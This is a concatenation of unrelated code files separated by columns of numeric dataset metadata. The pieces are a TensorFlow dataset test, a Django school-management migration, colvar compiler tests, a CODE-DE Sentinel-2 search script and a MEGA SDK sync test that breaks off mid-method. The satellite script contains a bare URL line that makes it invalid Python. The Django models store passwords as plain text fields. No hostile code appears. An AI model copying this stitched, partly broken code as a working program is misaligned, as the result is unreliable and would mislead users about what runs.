with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
def testTPU(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
if __name__ == "__main__":
tf.test.main()
| 40.833076
| 84
| 0.542526
| 3,228
| 26,419
| 4.228005
| 0.083024
| 0.011577
| 0.015607
| 0.020516
| 0.826788
| 0.820999
| 0.799751
| 0.774985
| 0.761137
| 0.705012
| 0
| 0.056608
| 0.326659
| 26,419
| 646
| 85
| 40.896285
| 0.710608
| 0.089822
| 0
| 0.731343
| 0
| 0
| 0.075126
| 0.001293
| 0
| 0
| 0
| 0
| 0.266525
| 1
| 0.034115
| false
| 0
| 0.017058
| 0
| 0.055437
| 0.002132
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
868857252402b155eb59e8b6ad1e32e2e1c11cad
| 3,587
|
py
|
Python
|
student_management_app/migrations/0001_initial.py
|
VictorCampelo/iSchool
|
809eaa993924b5bc0bf2b748c3f8cd4ecf00bc12
|
[
"MIT"
] | null | null | null |
student_management_app/migrations/0001_initial.py
|
VictorCampelo/iSchool
|
809eaa993924b5bc0bf2b748c3f8cd4ecf00bc12
|
[
"MIT"
] | null | null | null |
student_management_app/migrations/0001_initial.py
|
VictorCampelo/iSchool
|
809eaa993924b5bc0bf2b748c3f8cd4ecf00bc12
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.5 on 2020-04-18 18:36
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Class',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Director',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Root',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Subject',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
('class_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='student_management_app.Class')),
('teacher_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='student_management_app.Teacher')),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('username', models.CharField(max_length=255)),
('email', models.EmailField(max_length=254)),
('password', models.CharField(max_length=255)),
('create_time', models.DateTimeField(auto_now_add=True)),
('update_time', models.DateTimeField(auto_now_add=True)),
('subject', models.ManyToManyField(to='student_management_app.Subject')),
],
),
]
| 43.216867
| 135
| 0.563145
| 342
| 3,587
| 5.704678
| 0.181287
| 0.073808
| 0.141466
| 0.166069
| 0.79959
| 0.79959
| 0.79959
| 0.79959
| 0.79959
| 0.750384
| 0
| 0.02503
| 0.298299
| 3,587
| 82
| 136
| 43.743902
| 0.750099
| 0.012545
| 0
| 0.773333
| 1
| 0
| 0.112994
| 0.024859
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.026667
| 0
| 0.08
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
86acf1a3790cee9e51f76da3d499ca13a6bd493f
| 20,125
|
py
|
Python
|
tests/test_compilers.py
|
kzinovjev/colvar
|
726a6f7d50b962bd3f935c033fef580188068525
|
[
"Apache-2.0"
] | null | null | null |
tests/test_compilers.py
|
kzinovjev/colvar
|
726a6f7d50b962bd3f935c033fef580188068525
|
[
"Apache-2.0"
] | null | null | null |
tests/test_compilers.py
|
kzinovjev/colvar
|
726a6f7d50b962bd3f935c033fef580188068525
|
[
"Apache-2.0"
] | null | null | null |
from colvar import compilers
def test_simple_distance():
raw = {
"type": "distance",
"atoms": [1, 2]
}
compiled = {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 5}}
],
[
{"type": "x", "params": {"index": 6}},
{"type": "x", "params": {"index": 7}},
{"type": "x", "params": {"index": 8}}
]
]
}
}
assert compilers.compile_schema(raw) == compiled
def test_centers_distance_no_weights():
raw = {
"type": "distance",
"centers": [
{"atoms": [1, 2, 3]},
{"atoms": [5, 6]}
]
}
compiled = {
"type": "distance",
"params": {
"centers": [
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 6}},
{"type": "x", "params": {"index": 9}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 7}},
{"type": "x", "params": {"index": 10}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 5}},
{"type": "x", "params": {"index": 8}},
{"type": "x", "params": {"index": 11}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
}
],
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 18}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 19}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 17}},
{"type": "x", "params": {"index": 20}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 1}}
],
"normalize": True
}
}
]
]
}
}
assert compilers.compile_schema(raw) == compiled
def test_weighted_distance():
raw = {
"type": "distance",
"centers": [
{"atoms": [1, 2, 3], "weights": [12, 12, 16]},
{"atoms": [5, 6], "weights": [1, 16]}
]
}
compiled = {
"type": "distance",
"params": {
"centers": [
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 6}},
{"type": "x", "params": {"index": 9}}
],
"weights": [
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 7}},
{"type": "x", "params": {"index": 10}}
],
"weights": [
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 5}},
{"type": "x", "params": {"index": 8}},
{"type": "x", "params": {"index": 11}}
],
"weights": [
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 12}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
}
],
[
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 18}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 19}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
},
{
"type": "linear",
"params": {
"colvars": [
{"type": "x", "params": {"index": 17}},
{"type": "x", "params": {"index": 20}}
],
"weights": [
{"type": "constant", "params": {"value": 1}},
{"type": "constant", "params": {"value": 16}}
],
"normalize": True
}
}
]
]
}
}
assert compilers.compile_schema(raw) == compiled
def test_linear():
raw = {
"type": "linear",
"colvars": [
{"type": "angle", "atoms": [1, 6, 7]},
{"type": "angle", "atoms": [3, 6, 7]},
{"type": "angle", "atoms": [4, 6, 7]},
{"type": "angle", "atoms": [5, 6, 7]}
],
"weights": [
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [1, 6]},
"L": 1,
"k": 10,
"x0": 1.5
},
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [3, 6]},
"L": 1,
"k": 10,
"x0": 1.5
},
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [4, 6]},
"L": 1,
"k": 10,
"x0": 1.5
},
{
"type": "sigmoid",
"colvar": {"type": "distance", "atoms": [5, 6]},
"L": 1,
"k": 10,
"x0": 1.5
}
],
"normalize": True
}
compiled = {
"type": "linear",
"params": {
"colvars": [
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 5}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
},
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 9}},
{"type": "x", "params": {"index": 10}},
{"type": "x", "params": {"index": 11}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
},
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 12}},
{"type": "x", "params": {"index": 13}},
{"type": "x", "params": {"index": 14}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
},
{
"type": "angle",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 17}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
],
[
{"type": "x", "params": {"index": 21}},
{"type": "x", "params": {"index": 22}},
{"type": "x", "params": {"index": 23}}
]
]
}
}
],
"weights": [
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 3}},
{"type": "x", "params": {"index": 4}},
{"type": "x", "params": {"index": 5}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
],
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
},
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 9}},
{"type": "x", "params": {"index": 10}},
{"type": "x", "params": {"index": 11}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
]
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
},
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 12}},
{"type": "x", "params": {"index": 13}},
{"type": "x", "params": {"index": 14}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
]
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
},
{
"type": "sigmoid",
"params": {
"colvar": {
"type": "distance",
"params": {
"centers": [
[
{"type": "x", "params": {"index": 15}},
{"type": "x", "params": {"index": 16}},
{"type": "x", "params": {"index": 17}}
],
[
{"type": "x", "params": {"index": 18}},
{"type": "x", "params": {"index": 19}},
{"type": "x", "params": {"index": 20}}
]
]
}
},
"L": 1,
"k": 10,
"x0": 1.5
}
}
],
"normalize": True
}
}
assert compilers.compile_schema(raw) == compiled
| 40.25
| 79
| 0.203876
| 984
| 20,125
| 4.156504
| 0.056911
| 0.117359
| 0.258191
| 0.37555
| 0.946944
| 0.92934
| 0.919071
| 0.919071
| 0.881174
| 0.864303
| 0
| 0.04024
| 0.635727
| 20,125
| 499
| 80
| 40.330661
| 0.517665
| 0
| 0
| 0.677686
| 0
| 0
| 0.170634
| 0
| 0
| 0
| 0
| 0
| 0.008264
| 1
| 0.008264
| false
| 0
| 0.002066
| 0
| 0.010331
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
86d07f895dd835810de18bef46e58e0da03b43de
| 4,824
|
py
|
Python
|
download/codede_query.py
|
sebfoe/BDC
|
3a24fb994865483b1b53d39ef5d596bac193b4fd
|
[
"MIT"
] | null | null | null |
download/codede_query.py
|
sebfoe/BDC
|
3a24fb994865483b1b53d39ef5d596bac193b4fd
|
[
"MIT"
] | null | null | null |
download/codede_query.py
|
sebfoe/BDC
|
3a24fb994865483b1b53d39ef5d596bac193b4fd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Search for products on CODE-DE
"""
import requests
API_QUERY = "https://finder.code-de.org/resto/api/collections/\
Sentinel2/search.json?maxRecords=2000&startDate=2015-06-01T00%3A00%3A00Z&completionDate=2020-08-31T23%3A59%3A59Z&location=all&processingLevel=LEVEL2A&productType=L2A&sortParam=startDate&sortOrder=descending&status=all&geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))&dataset=ESA-DATASET"
#%%
API_search_string = "https://finder.code-de.org/resto/api/collections/"
API_search_platform = "Sentinel2"
API_search_max_rec = "2000" # 2000 maximum
API_search_start_date = "2015-06-01"
API_search_end_date = "2015-12-31"
# mecklenburg-vorpommern, TODO method to load and shape from drive
#API_search_geometry = "geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))"
# bavaria
API_search_geometry = "geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))"
API_search_product = "L2A"
#%%
tester = API_search_string + "&" + API_search_platform + "/search.json?maxRecords=" + API_search_max_rec + \
API_search_start_date + API_search_end_date + API_search_geometry + API_search_product
#%%
#%%
#API_QUERY = "https://finder.code-de.org/resto/api/collections/Sentinel2/search.json?maxRecords=2000&startDate=2020-06-01T00%3A00%3A00Z&completionDate=2020-06-10T23%3A59%3A59Z&location=all&processingLevel=LEVEL2A&productType=L2A&sortParam=startDate&sortOrder=descending&status=all&geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))&dataset=ESA-DATASET"
totalResults = requests.get(API_QUERY+str(1)).json()
nr = 1
page = 1
#%%
while True:
try:
result = requests.get(API_QUERY+str(page)).json()['features']
page += 1
except:
print('exception error')
break
else:
if result:
for product in result:
print(f"{product['properties']['productIdentifier']}")
nr += 1
else:
stop = 1
break
print(f"number of records:{nr-1}")
#%% query token june 01 to 10th June 2020 using geojson extents
https://finder.code-de.org/resto/api/collections/Sentinel2/search.json?maxRecords=2000&startDate=2020-06-01T00%3A00%3A00Z&completionDate=2020-06-10T23%3A59%3A59Z&location=all&processingLevel=LEVEL2A&productType=L2A&sortParam=startDate&sortOrder=descending&status=all&geometry=MULTIPOLYGON(((10.075764399693792+50.7584800022297%2C12.857942844697517+50.11881493057439%2C13.26617381810968+49.29881963934912%2C14.217987338132907+49.22218442674205%2C14.300279271021745+48.11263889020893%2C13.109595651339728+48.095905408956725%2C13.301598637480263+47.3767477717403%2C9.935377441223283+47.33192184804318%2C9.648877768451609+49.76911209425333%2C8.795579731357476+49.83629725294199%2C8.342330582735308+50.162347132709186%2C9.421883063132148+50.266440862302375%2C10.075764399693792+50.7584800022297)))&dataset=ESA-DATASET
#%%
| 67.943662
| 827
| 0.80908
| 561
| 4,824
| 6.885918
| 0.256684
| 0.034947
| 0.07766
| 0.04789
| 0.826301
| 0.814911
| 0.806109
| 0.806109
| 0.796013
| 0.796013
| 0
| 0.519351
| 0.067993
| 4,824
| 70
| 828
| 68.914286
| 0.339858
| 0.327322
| 0
| 0.125
| 0
| 0.0625
| 0.227586
| 0.185893
| 0
| 0
| 0
| 0.014286
| 0
| 0
| null | null | 0
| 0.03125
| null | null | 0.09375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
86fe2e0c224a1ffc7e93ad40aca56d48703290c4
| 16,332
|
py
|
Python
|
tests/sync_test.py
|
lfcontato/meganz
|
59f3cd493acfcf7361cb6862f2e4a39fc4494e33
|
[
"BSD-2-Clause"
] | null | null | null |
tests/sync_test.py
|
lfcontato/meganz
|
59f3cd493acfcf7361cb6862f2e4a39fc4494e33
|
[
"BSD-2-Clause"
] | null | null | null |
tests/sync_test.py
|
lfcontato/meganz
|
59f3cd493acfcf7361cb6862f2e4a39fc4494e33
|
[
"BSD-2-Clause"
] | null | null | null |
"""
Base class for testing syncing algorithm
(c) 2013-2014 by Mega Limited, Wellsford, New Zealand
This file is part of the MEGA SDK - Client Access Engine.
Applications using the MEGA API must present a valid application key
and comply with the the rules set forth in the Terms of Service.
The MEGA SDK is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
@copyright Simplified (2-clause) BSD License.
You should have received a copy of the license along with this
program.
"""
# TODO tests:
# * "pause" sync
# * lock directory
# * large (> 4Gb) files
# * > 10000 folders to synchronize
from sync_test_base import SyncTestBase
from sync_test_base import get_random_str
from sync_test_base import generate_unicode_name
import random
import os
import logging
import time
import math
class SyncTest(SyncTestBase):
"""
Class with MEGA SDK test methods
"""
# tests
def test_create_delete_files(self):
"""
create files with different size,
compare files on both folders,
remove files, check that files removed from the second folder
"""
logging.info("Launching test_create_delete_files test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create files
l_files = self.files_create()
self.assertIsNotNone(l_files, "Creating files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.files_remove(l_files), "Removing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_create_rename_delete_files(self):
"""
create files with different size,
compare files on both folders,
rename files
"""
logging.info("Launching test_create_rename_delete_files test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create files
l_files = self.files_create()
self.assertIsNotNone(l_files, "Creating files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# renaming
self.assertTrue(self.files_rename(l_files), "Renaming files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.files_remove(l_files), "Removing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_create_delete_dirs(self):
"""
create directories with different amount of files,
compare directories on both sync folders,
remove directories, check that directories removed from the second folder
"""
logging.info("Launching test_create_delete_dirs test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create dirs
l_dirs = self.dirs_create()
self.assertIsNotNone(l_dirs, "Creating directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.dirs_remove(l_dirs), "Removing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_create_rename_delete_dirs(self):
"""
create directories with different amount of files,
compare directories on both sync folders,
rename directories
compare directories on both sync folders,
remove directories, check that directories removed from the second folder
"""
logging.info("Launching test_create_rename_delete_dirs test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create dirs
l_dirs = self.dirs_create()
self.assertIsNotNone(l_dirs, "Creating directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# rename dirs
self.assertTrue(self.dirs_rename(l_dirs), "Rename directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.dirs_remove(l_dirs), "Removing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
return True
def test_sync_files_write(self):
"""
write data to a file located in both sync folders
check for the result, expected result: both files contains the same content
"""
logging.info("Launching test_sync_files_write test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
for _ in range(0, self.nr_files):
self.assertTrue(self.app.is_alive(), "Test application is not running")
strlen = random.randint(10, 20)
fname = get_random_str(size=strlen)
fname_in = os.path.join(self.app.local_folder_in, fname)
fname_out = os.path.join(self.app.local_folder_out, fname)
logging.debug("Writing to both files: %s and %s" % (fname_in, fname_out))
with open(fname_in, 'a'):
os.utime(fname_in, None)
with open(fname_out, 'a'):
os.utime(fname_out, None)
#self.app.sync()
for _ in range(self.nr_changes):
with open(fname_in, 'a') as f_in:
f_in.write(get_random_str(100))
with open(fname_out, 'a') as f_out:
f_out.write(get_random_str(100))
for r in range(self.app.nr_retries):
self.app.attempt=r
md5_in = "INPUT FILE NOT READABLE";
md5_out = "OUTPUT FILE NOT READABLE";
try:
md5_in = self.md5_for_file(fname_in)
md5_out = self.md5_for_file(fname_out)
except IOError:
pass;
if md5_in == md5_out:
break
self.app.sync()
logging.debug("File %s md5: %s" % (fname_in, md5_in))
logging.debug("File %s md5: %s" % (fname_out, md5_out))
self.assertEqual(md5_in, md5_out, "Files do not match")
def test_local_operations(self):
"""
write data to a file located in both sync folders
check for the result, expected result: both files contains the same content
"""
logging.info("Launching test_local_operations test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders();
l_tree = self.local_tree_create("", self.nr_dirs)
self.assertIsNotNone(l_tree, "Failed to create directory tree!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
self.assertTrue(self.local_tree_compare(l_tree), "Failed to compare directory trees!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.assertTrue(self.local_tree_create_and_move(l_tree), "Failed to create a new sub folder and move an existing directory into it!")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.assertTrue(self.local_tree_multiple_renames(l_tree), "Failed to rename folder multiple times and then rename back to the original name!")
